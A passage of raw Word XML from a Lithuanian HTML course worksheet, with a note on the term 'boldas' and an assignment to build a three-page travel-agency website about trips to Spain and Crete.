          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09B190AF" wp14:editId="7C084CEE">
            <wp:extent cx="5910580" cy="2795905"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="4445"/>
            <wp:docPr id="17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l="641" r="-2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5910580" cy="2795905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="BFBFBF"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTYJE NAUDOJAMAS TEKSTAS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>boldas, pusjuodis, pastorintasis šriftas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ar vartotinas žodis „boldas“?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Boldas – nevartotina svetimybė. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>V. Dagienės, G. Grigo, T. Jevsikovos „Enciklopediniame kompiuterijos žodyne“ (Vilnius, 2008, p. 389) teikiamas terminas pusjuodis, angl. bold. Tai šrifto stilius, kai rašmenys, norint juos paryškinti, piešiami pastorintomis linijomis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kaip nevartotina svetimybė boldas vertinamas „Kalbos patarimuose“, siūlomi pakaitai: 1. pusjuodis; 2. pastorintasis (šriftas) (žr.: Kalbos patarimai. Kn. 4: Leksika: 1. Skolinių vartojimas, Vilnius, 2013, p. 19; pataisytas ir papildytas leidimas, Vilnius, 2005, p. 33).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Žymės: kompiuterija, leksika, neteiktina svetimybė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00767B4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PATEIKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> TURINĮ HTML ŽYMĖJIMO KALBA (KELIONIŲ AGENTŪRA)</w:t>
      </w:r>
      <w:r w:rsidR="008A4AC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES SĄLYGA: naudojant HTML antraščių, pastraipos, sąrašų ir kitus elementus, sukurti puslapį iš kelių tinklalapių, susietų nuorodomis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00767B4F" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767B4F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Reikalavimai: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00767B4F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="425" w:right="284" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767B4F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Failų pavadinimai: index.html,  poilsines-keliones.html,  kelioniu-datos.html.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00767B4F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="425" w:right="284" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767B4F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Grafiniai vaizdai saugomi aplanke, pavadinimu IMG.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="426" w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ATSKIRŲ TINKLAPIO PUSLAPIŲ TURINYS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>-----------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>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askutinė minutė</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oilsinės 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Kelionių datos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Paskutinė minutė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Ispanija, Kosta Dorada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="657C51FA" wp14:editId="6D61C60D">
            <wp:extent cx="3352800" cy="1537335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="176" name="Picture 22" descr="C:\Users\Justina\VTVPMC\2 - VTVPMC EMS\1 - DALYKAI\2017-2018 m.m\4M - HTML, CSS, JS\1- HTML\WF\ispan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ustina\VTVPMC\2 - VTVPMC EMS\1 - DALYKAI\2017-2018 m.m\4M - HTML, CSS, JS\1- HTML\WF\ispanij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2800" cy="1537335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Paskutinės minutės atostogos Ispanijoje, Salou! Skrydis iš Vilniaus, bagažas, pervežimai ir 7 n. viešbutyje su pusryčiais ir vakarienėmis – 379 €!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Išvykimo laikai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Vilnius – Barselona 14:00 – 16:30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Barselona – Vilnius 17:30 – 22:00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Į kelionės kainą įskaičiuota:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Skrydis Vilnius – Barselona – Vilnius;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Pervežimas oro uostas – viešbutis – oro uostas;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>20 kg registruojamas ir rankinis bagažai;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>7 n. apgyvendinimas pasirinktame viešbutyje su nurodytu maitinimo tipu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>-----------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>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askutinė minutė</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oilsinės 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Kelionių datos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Poilsinės kelionės</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Ispanija, Kosta Dorada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AF7BF95" wp14:editId="6D7D8F78">
            <wp:extent cx="2451735" cy="1126490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="177" name="Picture 23" descr="C:\Users\Justina\VTVPMC\2 - VTVPMC EMS\1 - DALYKAI\2017-2018 m.m\4M - HTML, CSS, JS\1- HTML\WF\ispan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ustina\VTVPMC\2 - VTVPMC EMS\1 - DALYKAI\2017-2018 m.m\4M - HTML, CSS, JS\1- HTML\WF\ispanija.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51735" cy="1126490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Paskutinės minutės atostogos Ispanijoje, Salou! Skrydis iš Vilniaus, bagažas, pervežimai ir 7 n. viešbutyje su pusryčiais ir vakarienėmis – 379 €! </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Plačiau...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kreta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04F5CE5B" wp14:editId="64FA31ED">
            <wp:extent cx="2359025" cy="1086485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="178" name="Picture 24" descr="C:\Users\Justina\VTVPMC\2 - VTVPMC EMS\1 - DALYKAI\2017-2018 m.m\4M - HTML, CSS, JS\1- HTML\WF\kr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ustina\VTVPMC\2 - VTVPMC EMS\1 - DALYKAI\2017-2018 m.m\4M - HTML, CSS, JS\1- HTML\WF\kreta.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59025" cy="1086485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Rugsėjį keliauk į vaizdingąją Kretą! Skrydis iš Vilniaus, bagažas, pervežimai ir 7 n. viešbutyje su „viskas įskaičiuota“ – 499 €! </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Plačiau...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>-----------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>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askutinė minutė</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Poilsinės kelionės</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000262D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kelionių datos</w:t>
      </w:r>
    </w:p>
